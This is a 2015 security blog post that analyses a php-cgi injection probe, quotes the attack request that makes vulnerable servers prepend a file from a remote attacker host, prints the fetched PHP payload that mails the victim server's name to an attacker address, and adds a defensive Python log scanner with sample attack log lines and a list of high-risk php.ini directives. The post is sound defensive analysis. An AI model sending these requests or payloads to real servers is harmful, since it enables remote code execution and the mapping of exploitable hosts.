Monday, November 30, 2015

php injection sending email

I saw this php injection attempt that I thought was interesting.

GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://netsunucum.com/status/-/d.txt


The attempt is scanning for mis-configured, insecure PHP web servers: ones that let an attacker pass php.ini directives in the query string, enable url includes (allow_url_include=On), and then automatically prepend a remote file (auto_prepend_file=...) to whatever PHP page is requested. When I downloaded the malicious payload file ( hxxp://netsunucum.com/status/-/d.txt [see at urlquery] ) I found this, which was also interesting.

SP4M3R
<?php
$from = "INBOX <h4x0r@r0x.com>";
$sentTo = "vaidominio2@gmail.com";
$subject = "VULN r0x";
$msg_body = "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
$header_info = "From: ".$from;
mail($sentTo, $subject, $msg_body, $header_info);
?>


If the php web server is vulnerable, then the php file above gets auto-included and prepended to the current php page, and is therefore executed. When it executes it uses PHP mail() to send an email to the attacker's gmail account, with the hit server's name and request URI in the body. So the attacker at vaidominio2@gmail.com gets an email confirming that the server named in the body is vulnerable to the php injection, which turns the scan into a ready-made list of exploitable hosts.
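Both the request above and the payload leave a clear footprint in web server access logs, so a defender can find these probes without ever fetching the attacker's file. The following Python script is an added example, not code from the original post: it parses combined-format access log lines, URL-decodes each query string (twice, to catch double-encoded variants), pulls out any smuggled php-cgi "-d name=value" directives, and rates the request by which directives it sets. The log lines are constructed samples; the first one reuses the request path quoted in this post, the others (including a php://input variant and a benign query that merely contains "-d" inside a parameter value) are assumptions made up for the example.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines (combined log format). The first request is the
# one quoted in the post; the rest are made-up examples for this script.
SAMPLE_LOG = """\
203.0.113.5 - - [30/Nov/2015:10:01:02 +0000] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://netsunucum.com/status/-/d.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [30/Nov/2015:10:01:03 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.7 - - [30/Nov/2015:10:02:10 +0000] "POST /cgi-bin/php?%2Dd+allow_url_include%3Don+%2Dd+auto_prepend_file%3Dphp://input HTTP/1.1" 200 99 "-" "curl/7.45"
198.51.100.7 - - [30/Nov/2015:10:02:11 +0000] "GET /?-d+display_errors%3D1 HTTP/1.1" 200 99 "-" "curl/7.45"
192.0.2.9 - - [30/Nov/2015:10:03:44 +0000] "GET /search?q=-d+foo HTTP/1.1" 200 77 "-" "Mozilla/5.0"
"""

# Request line inside the quoted part of a combined-format log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# After decoding, a php-cgi directive looks like "-d name=value". Requiring whitespace
# or start-of-string before "-d" avoids flagging "-d" that merely appears inside a value.
DIRECTIVE_RE = re.compile(r'(?:^|\s)-d\s*(?P<name>[A-Za-z_.]+)\s*=\s*(?P<value>\S*)')

# Directives that turn an argument-injection probe into remote code execution or
# disable protections; any other -d directive is still suspicious, just lower risk.
HIGH_RISK = {"allow_url_include", "auto_prepend_file", "auto_append_file",
             "disable_functions", "safe_mode", "open_basedir"}


def extract_directives(target):
    """Return [(name, value), ...] for php.ini directives smuggled in the query string."""
    query = urlsplit(target).query
    if not query:
        return []
    decoded = unquote_plus(unquote_plus(query))  # second pass catches double encoding
    return [(m.group("name").lower(), m.group("value"))
            for m in DIRECTIVE_RE.finditer(decoded)]


def classify(directives):
    """'high' if a dangerous directive is set, 'low' for any other -d directive, else None."""
    names = {name for name, _ in directives}
    if names & HIGH_RISK:
        return "high"
    return "low" if names else None


def remote_includes(directives):
    """URLs or stream wrappers the request asked php-cgi to prepend/append (IoCs)."""
    return [value for name, value in directives
            if name in ("auto_prepend_file", "auto_append_file") and "://" in value]


def scan_access_log(text):
    """Return one finding dict per request whose query string carries -d directives."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        directives = extract_directives(m.group("target"))
        risk = classify(directives)
        if risk is None:
            continue
        findings.append({
            "client": line.split(" ", 1)[0],
            "method": m.group("method"),
            "target": m.group("target"),
            "directives": directives,
            "risk": risk,
            "remote_files": remote_includes(directives),
        })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f["risk"].upper(), f["client"], f["method"], f["directives"], f["remote_files"])
```

The "remote_files" field is the part worth feeding into blocklists or URL-analysis services: it is exactly where the attacker's second-stage file lives. A "high" finding from a host that actually serves PHP through php-cgi is worth a look at outbound mail logs for the same time window, since the payload shown in this post would have emailed the hit host's name out.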




Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

2 comments:

  1. yep... I got flooded. 1000s of webforms sent to me.

    https://yadi.sk/i/cGgTsWn3mHQNQ
